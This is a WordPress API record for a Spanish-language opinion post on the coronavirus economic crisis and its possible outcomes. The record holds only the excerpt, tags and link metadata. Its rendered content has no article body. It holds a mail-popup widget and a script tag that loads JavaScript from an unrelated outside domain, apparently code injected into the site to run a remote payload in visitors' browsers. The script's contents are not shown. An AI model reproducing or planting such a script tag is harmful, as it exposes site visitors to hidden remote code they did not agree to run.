{"id":20188,"date":"2020-07-23T22:40:58","date_gmt":"2020-07-23T22:40:58","guid":{"rendered":"http:\/\/www.lapluma.net\/?p=20188"},"modified":"2022-04-02T15:58:01","modified_gmt":"2022-04-02T15:58:01","slug":"la-bolsa-o-la-vida-crisis-y-salidas-a-la-crisis-en-epoca-de-coronavirus","status":"publish","type":"post","link":"https:\/\/www.lapluma.net\/fr\/2020\/07\/23\/la-bolsa-o-la-vida-crisis-y-salidas-a-la-crisis-en-epoca-de-coronavirus\/","title":{"rendered":"\u00bfLa bolsa o la vida? Crisis y salidas a la crisis en \u00e9poca de Coronavirus"},"content":{"rendered":"<p>&nbsp;<\/p>\n<div id=\"ffenetremailtomailModal\" style=\"z-index: 20002;\">\n<div id=\"ffenetremailtopopupModalMail\">\n<div id=\"ffenetremailtotoModalClose\"><\/div>\n<div id=\"ffenetremailtopopupQuestion\">What do you want to do ?<\/div>\n<p><a id=\"ffenetremailtoemailOpen\"><\/a>New mail<button id=\"ffenetremailtobuttonEmail\">Copy<\/button><textarea id=\"ffenetremailtotextArea\"><\/textarea><\/div>\n<\/div>\n<div><img \/><\/div>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>S\u00f3lo ensayando la segunda forma, la m\u00e1s peligrosa de no sufrir el infierno, podr\u00edamos decir que en 2021 el mundo de la \u201cnormalidad esperada\u201d no ser\u00e1 el mismo de 2019. Para Colombia y Am\u00e9rica Latina podr\u00eda ser mejor.<\/p>\n","protected":false},"author":676,"featured_media":17791,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[5],"tags":[65,10015,10004,9003,10003,10011,5596,10002,10006,10018,10005,10001,10012,10008,10019,10010,10017,10014,10020,10013],"coauthors":[9999],"class_list":["post-20188","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-editoriales-y-opiniones","tag-abya-yala","tag-accion-politica-revolucionaria","tag-bancarrota-ideologica-del-neoliberalismo","tag-crisis-economica-pandemia-del-coronavirus","tag-crisis-sistemica-del-capitalismo","tag-crisis-y-utopia","tag-darwinismo-social","tag-debacle-economica-y-social","tag-desigualdad-pobreza","tag-el-otro-de-la-crisis","tag-estado-elites-colombianas","tag-expansion-del-coronavirus","tag-experiencia-historica","tag-grupos-empresariales","tag-horizontes-de-futuro-posibles","tag-jaime-rafael-nieto-lopez","tag-la-crisis-y-sus-discursos","tag-lenin-trotsky-y-gramsci","tag-necro-politica-del-capital","tag-quiebre-del-orden-social"],"translation":{"provider":"WPGlobus","version":"2.12.2","language":"fr","enabled_languages":["es","fr"],"languages":{"es":{"title":true,"content":true,"excerpt":true},"fr":{"title":false,"content":true,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/20188","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/users\/676"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/comments?post=20188"}],"version-history":[{"count":11,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/20188\/revisions"}],"predecessor-version":[{"id":36860,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/20188\/revisions\/36860"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media\/17791"}],"wp:attachment":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media?parent=20188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/categories?post=20188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/tags?post=20188"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/coauthors?post=20188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}